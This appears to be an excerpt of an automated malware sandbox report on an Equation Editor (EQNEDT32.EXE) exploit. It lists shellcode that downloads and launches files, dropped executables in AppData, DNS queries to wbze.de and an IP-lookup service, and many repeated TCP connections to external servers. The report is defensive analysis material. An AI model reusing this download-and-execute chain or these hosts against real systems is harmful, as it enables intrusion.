Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_036106CB ShellExecuteW,ExitProcess,	8_2_036106CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_0361062C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0361069D URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_0361069D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_036106F0 ExitProcess,	8_2_036106F0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_03610646 URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_03610646
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_036106B6 ShellExecuteW,ExitProcess,	8_2_036106B6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_036105B8 URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_036105B8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_03610583 ExitProcess,	8_2_03610583

Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 4x nop then jmp 007318D1h	9_2_007319B0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 4x nop then jmp 007318D1h	9_2_00731C58
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 4x nop then jmp 00C018D1h	11_2_00C019B0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 4x nop then jmp 00C018D1h	11_2_00C01C58
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 4x nop then jmp 00BF18D1h	14_2_00BF19B0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 4x nop then jmp 00BF18D1h	14_2_00BF1C58

Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: wbze.de
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org

Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
